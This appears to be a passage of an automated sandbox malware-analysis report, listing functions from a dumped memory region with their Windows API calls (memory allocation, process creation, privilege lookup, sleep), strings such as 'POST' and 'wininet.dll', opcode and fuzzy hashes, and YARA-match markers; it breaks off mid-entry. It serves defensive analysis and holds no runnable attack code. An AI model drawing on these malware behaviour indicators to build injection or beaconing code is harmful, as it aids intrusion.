                    Function 0071A53C, Relevance: 1.5, APIs: 1, Instructions: 31memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                    • Instruction ID: e83e1e22cfbd22110d7e6fdbee22006cb03012ba97fc6a1e68213fac0a757cdc
                    • Opcode Fuzzy Hash: 73c67fecdb17961c11ed84289770de546856e7ddf6712c32a9059fd093956411
                    • Instruction Fuzzy Hash: A3F0F2B6210208ABDB18DF89CC81EEB77ADEF88754F118149FA1897241C631E912CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A540, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                    Download Yara Rule
                    APIs
                    • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00702D11,00002000,00003000,00000004), ref: 0071A579
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateMemoryVirtual
                    • String ID:
                    • API String ID: 2167126740-0
                    • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction ID: 9be94932b48655d3567ca32908a0634e4d50c83274fb37f1215147392d8ac2be
                    • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                    • Instruction Fuzzy Hash: 12F015B2200208ABCB14DF89CC81EEB77ADEF88754F118148BE0897241C630F811CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949840, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                    • Instruction ID: 0b592ebaa32ecd996efdb12b340020ae97f2b2b4f35bc77e1b3316eaea11facc
                    • Opcode Fuzzy Hash: f92aedc884deb203393d2c3a1bef354cbf76a765376c4a5506ae7045f90a8d15
                    • Instruction Fuzzy Hash: 72900261242141537546F15984045074056E7E02857A1C122A5405951C8566E896E761
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                    • Instruction ID: f3852293a892711c24f47c4f21a0fd6891de9983a8a261295fa5910268262069
                    • Opcode Fuzzy Hash: 9c137e32171303a661ea0113f3c99b139025e865634e5edf9b52149bb49c7b14
                    • Instruction Fuzzy Hash: 8190027120110413F112A15985047070059D7D0285FA1C522A4415559D9696D992B261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 049499A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                    • Instruction ID: cdf24cf172266a349a897aaa16731bf540c8a1cd373ce5c9e03f1a15f8775c56
                    • Opcode Fuzzy Hash: 123e6e2610a35ffd341247ff7c4db67e3bd035993c7b11ae3861d20dc64166c9
                    • Instruction Fuzzy Hash: 259002A134110443F101A1598414B060055D7E1345F61C125E5055555D8659DC927266
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 049495D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                    • Instruction ID: ad985d7ec074aff7f6f95c97514cc87659f208d5a8052c9a9a2aaa4048048580
                    • Opcode Fuzzy Hash: 443ee4ab5265b710b2cbdac2e5578b6f99271512b89a62dd46542b68b5b38f1a
                    • Instruction Fuzzy Hash: C69002A1202100036106B1598414616405AD7E0245B61C131E5005591DC565D8D17265
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                    • Instruction ID: 51c1c2c80f079b5a4eb33599d0eea781437d4d23fb3f24968c7d26255cdab597
                    • Opcode Fuzzy Hash: c0174bba570a21cfb926b6dc4fcc97aff31e33f78c16b74876eb8457ab81f7cb
                    • Instruction Fuzzy Hash: 2F9002B120110403F141B15984047460055D7D0345F61C121A9055555E8699DDD577A5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949540, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                    • Instruction ID: 08206ddabb80e2a15f03583f89ee6cbd36d6a181945b0da869421095617b4791
                    • Opcode Fuzzy Hash: 7e8ab1b0f125b9a8c0bc580017313e6cf042c6f5ecd2970cba45f9546ed84f13
                    • Instruction Fuzzy Hash: 9F900265211100032106E55947045070096D7D5395361C131F5006551CD661D8A16261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 049496D0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                    • Instruction ID: 251824873494dc26601b12a0950dbbbfa1b0f9e96fff353050aebf6eddcd187a
                    • Opcode Fuzzy Hash: 7b2ac1870162b4af706d5286d4818bf81c11b1178d0ea60c12eed28ac6441f3d
                    • Instruction Fuzzy Hash: 2F90027120110843F101A1598404B460055D7E0345F61C126A4115655D8655D8917661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 049496E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                    • Instruction ID: bdc84eb22028c0b31cc4170baec6d571df5189836c7a331529c3b36e0cdaa3b4
                    • Opcode Fuzzy Hash: 571c4cce36f1d2fe264bc5f122d1b44997803d61b143a79a5e8a361b174ccf89
                    • Instruction Fuzzy Hash: B790027120118803F111A159C40474A0055D7D0345F65C521A8415659D86D5D8D17261
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949A50, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                    • Instruction ID: 849d81a2087d660230ca965395df71413cb6d9abf70c33de06207afcba5e3560
                    • Opcode Fuzzy Hash: 5638398a595694bdc8944b00ac629a7ba9f49cffdb6387d80a93eb188f4a9967
                    • Instruction Fuzzy Hash: DD90026121190043F201A5698C14B070055D7D0347F61C225A4145555CC955D8A16661
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949650, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                    • Instruction ID: f14acf949a1c67d54b389c96bb5ebba9086f60745274fcbbdf559e14293357d0
                    • Opcode Fuzzy Hash: 91e42525d63f69012f566c10c90ab3c5b66d3e5751b60d86c828de6f57f5dbcb
                    • Instruction Fuzzy Hash: 5090027120514843F141B1598404A460065D7D0349F61C121A4055695D9665DD95B7A1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949660, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                    • Instruction ID: f477d9ea2edfdd041adb6de88183c28b4f23c9a85091530434325d78dc0c0dc0
                    • Opcode Fuzzy Hash: 428324637773fe422f8e0c3158abe9633f695f4dcad19ccae0f4d518e65edb4f
                    • Instruction Fuzzy Hash: 2190027120110803F181B159840464A0055D7D1345FA1C125A4016655DCA55DA9977E1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949780, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                    • Instruction ID: 7ef0a04642cedd6e161cec63c72a95f1cb8a906a8fc53e29544facd56ca4146d
                    • Opcode Fuzzy Hash: f2a3e8040df23f2db711be3d8a69eaebf0a89be31d02ca9aaa1a5970d8510f3f
                    • Instruction Fuzzy Hash: D190026921310003F181B159940860A0055D7D1246FA1D525A4006559CC955D8A96361
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949FE0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                    • Instruction ID: 7cc4b2bb4ec486d5d8b0af6adca346635d971e63e0c5e4d139ede5bb177491e3
                    • Opcode Fuzzy Hash: 2ff817b57df89ae59a89acd0729a5c8ab2d13207bbf205002a1e9470b12fe301
                    • Instruction Fuzzy Hash: B290027131124403F111A159C4047060055D7D1245F61C521A4815559D86D5D8D17262
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04949710, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 0000000B.00000002.622596492.00000000048E0000.00000040.00000001.sdmp, Offset: 048E0000, based on PE: true
                    • Associated: 0000000B.00000002.622823547.00000000049FB000.00000040.00000001.sdmp Download File
                    • Associated: 0000000B.00000002.622836727.00000000049FF000.00000040.00000001.sdmp Download File
                    Similarity
                    • API ID: InitializeThunk
                    • String ID:
                    • API String ID: 2994545307-0
                    • Opcode ID: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                    • Instruction ID: 7c6129550f70f8483f2c74a18a14a99c24142283ba55cdca4b535200cbcfbcf4
                    • Opcode Fuzzy Hash: 2b5c949ccf6d4218bd6566fb872276ac781f342630ad7487395c76a7a06b81aa
                    • Instruction Fuzzy Hash: 6E90027120110403F101A59994086460055D7E0345F61D121A9015556EC6A5D8D17271
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00719076, Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 101sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00719128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: POST$net.dll$wininet.dll
                    • API String ID: 3472027048-3140911592
                    • Opcode ID: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                    • Instruction ID: 0f4d8f4cc7f4af599351b9e77cde029e7ee49b42e7ccabd4e91a79eb1b798dd4
                    • Opcode Fuzzy Hash: 21503c2815ffec126fad4fa22fe696a6e5cf4123ad9a1f4ad1931ad061aa9901
                    • Instruction Fuzzy Hash: 603105B2500205FBD714DF68C889BEBB7B8FF48704F108119FA2D5B281D778A995CBA5
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00719080, Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 90sleepCOMMON
                    Download Yara Rule
                    APIs
                    • Sleep.KERNELBASE(000007D0), ref: 00719128
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Sleep
                    • String ID: net.dll$wininet.dll
                    • API String ID: 3472027048-1269752229
                    • Opcode ID: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                    • Instruction ID: fc29a015b66a2a6a1ab9cc3ad29fc9e22b662a1158e27433a40e6a820193e322
                    • Opcode Fuzzy Hash: a77418eb90fed03aa7c14b10b3b0bd65db0ada577fe5392f405e5ce4b993d58d
                    • Instruction Fuzzy Hash: D631B2B2500345FBC714DF68C889FA7B7B9FB48B00F10851DF62A5B285D634B690CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A775, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 61processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID: .qP
                    • API String ID: 2186235152-829528964
                    • Opcode ID: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                    • Instruction ID: 74a4c1dc51f015881951007d93fbd34281232cdedc3c60a73a5399fe23fa6628
                    • Opcode Fuzzy Hash: c81224339e75ab53635f4ff4be2a4b8e319ad2baa13f8d9a8a23c9844943465f
                    • Instruction Fuzzy Hash: F8118EB5205248BFDB14DF98DC81DE777ACEF88724F14829AF94C8B246C534E855CBA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A670, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlFreeHeap.NTDLL(00000060,00000000,.z`,007A002E,00000000,00000060,00000000,00000000,?,?,00700069,?,00703AF8), ref: 0071A69D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: FreeHeap
                    • String ID: .z`
                    • API String ID: 3298025750-1441809116
                    • Opcode ID: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction ID: 41cc9e616e74eae14af32a8c54f83710cb713958fde3b277435bf85a0bd9d986
                    • Opcode Fuzzy Hash: 540c4433df045b48126259b9153db85e530e9dd1f040c1eb84158749b6bc4ef9
                    • Instruction Fuzzy Hash: 5BE01AB1200208ABD714DF59CC49EA777ACEF88750F118554B90857241C630E9108AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A630, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 24memoryCOMMON
                    Download Yara Rule
                    APIs
                    • RtlAllocateHeap.NTDLL(6Eq,?,00714CAF,00714CAF,?,00714536,?,?,?,?,?,00000000,00000000,?), ref: 0071A65D
                    Strings
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: AllocateHeap
                    • String ID: 6Eq
                    • API String ID: 1279760036-1974188762
                    • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction ID: ffa65bc336d7caae1fa1e0e264671a160e33d3ccc928e233ed5e841b8b0f2631
                    • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                    • Instruction Fuzzy Hash: 05E012B1200208ABDB14EF99CC45EA777ACEF88664F118558BA085B282C630F9118AB0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00708308, Relevance: 3.1, APIs: 2, Instructions: 61threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                    • Instruction ID: e986020a2c8a5e5fb8354090e71d9e5a7d139c0e15956656078b1a55add45d48
                    • Opcode Fuzzy Hash: 5f402ef30ff872db9391dafd90e07617a7bfdda7e2d4461ac7fadc8f762b377b
                    • Instruction Fuzzy Hash: CF01DB31980328F7E721A6949C46FFE77686F40B90F044248FF04BB1C2D698690647E2
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 00708310, Relevance: 3.1, APIs: 2, Instructions: 55threadwindowCOMMON
                    Download Yara Rule
                    APIs
                    • PostThreadMessageW.USER32(0065002E,00000111,00000000,00000000,00000000), ref: 0070836A
                    • PostThreadMessageW.USER32(0065002E,00008003,00000000,?,00000000), ref: 0070838B
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: MessagePostThread
                    • String ID:
                    • API String ID: 1836367815-0
                    • Opcode ID: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction ID: 467849cb9dc17daad0e9b8c027fd97f7590967642f8f79d549ea52db9dadecac
                    • Opcode Fuzzy Hash: a493eabf7697513180435b5f665ed638a4e8f6b3857f93d23393bef0d0da5e70
                    • Instruction Fuzzy Hash: AF01A731A80328F7E721A6949C47FFE776C5B40F50F054214FF04BA1C2EAD8690546F6
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0070ACF0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0070AD62
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: Load
                    • String ID:
                    • API String ID: 2234796835-0
                    • Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction ID: 8d3a0f66cbcb94614f885e292d79eb6d61490c6b700c26529869882ac0c3e71b
                    • Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
                    • Instruction Fuzzy Hash: E6015EB5E0020DFBDF10DBE4DC46FEDB3B89B14308F004695A90897281F634EB448B91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0070F6C7, Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNELBASE(00008003,?,00708D14,?), ref: 0070F6FB
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: ErrorMode
                    • String ID:
                    • API String ID: 2340568224-0
                    • Opcode ID: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                    • Instruction ID: 46ca0f24a91aec375d85ae4590d559191250d12b15c307565ea24b045ec61980
                    • Opcode Fuzzy Hash: 4122df8dead49c64f1156d70ec1abdf76d6893d67eeb1b1fee6585eae0c3ad26
                    • Instruction Fuzzy Hash: AB018871A4020CAAEB20EBA4DC86FEA73A8AF54B10F044694F908971C3D7B499C58791
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A6E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction ID: c2efde9618a2c8b2d70dd091125b021300094815cdaa75941565f2b5f1711a6c
                    • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                    • Instruction Fuzzy Hash: 3F01AFB2210108BBCB54DF89DC80EEB77ADAF8C754F158258BA0D97241C630E851CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A6E2, Relevance: 1.5, APIs: 1, Instructions: 41processCOMMON
                    Download Yara Rule
                    APIs
                    • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 0071A734
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateInternalProcess
                    • String ID:
                    • API String ID: 2186235152-0
                    • Opcode ID: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                    • Instruction ID: 79ff7dbfd574563fe578179583543840ccf595450dbae1f395a36112bcb5e63b
                    • Opcode Fuzzy Hash: 65430b4bcd81f8e4a1f34887c09f54abf117a2fedab366dd768bbf62a6493fde
                    • Instruction Fuzzy Hash: 0701ABB2200108BFCB58CF89DC80EEB37ADAF8C754F158258BA0DE7240C630E851CBA0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 007191B0, Relevance: 1.5, APIs: 1, Instructions: 36threadCOMMON
                    Download Yara Rule
                    APIs
                    • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000,?,?,0070F050,?,?,00000000), ref: 007191EC
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: CreateThread
                    • String ID:
                    • API String ID: 2422867632-0
                    • Opcode ID: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                    • Instruction ID: e9c33b9279335dbd46047a2cbbc87680083c234b77cda2f5c69e3faca1f63e97
                    • Opcode Fuzzy Hash: 6688f86f132fa37c9027dc8d1c8f8cbb4e701adb4342013b9a08c6fd41ac5782
                    • Instruction Fuzzy Hash: A1E06D773903043AE320659DAC02FE7B29C9B81B20F140026FB0DEA2C1D999F88142A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A7C4, Relevance: 1.5, APIs: 1, Instructions: 36COMMON
                    Download Yara Rule
                    APIs
                    • LookupPrivilegeValueW.ADVAPI32(00000000,?,0070F1D2,0070F1D2,?,00000000,?,?), ref: 0071A800
                    Memory Dump Source
                    • Source File: 0000000B.00000002.617350722.0000000000700000.00000040.00020000.sdmp, Offset: 00700000, based on PE: false
                    Yara matches
                    Similarity
                    • API ID: LookupPrivilegeValue
                    • String ID:
                    • API String ID: 3899507212-0
                    • Opcode ID: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                    • Instruction ID: e78acd6007cd6dc8112122ad9e9ce359af18daf8c4529ebbac18b8606510b5ae
                    • Opcode Fuzzy Hash: 19fea9491f50e488765742f420a6f4cf67f724ee41bc20e91e9c64c2348761ea
                    • Instruction Fuzzy Hash: 4FF05EB62102087BDB10EF99DC81EE773ADEF88720F108559FD0C97281C535E9018BB1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 0071A7D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                    Download Yara Rule
                    APIs
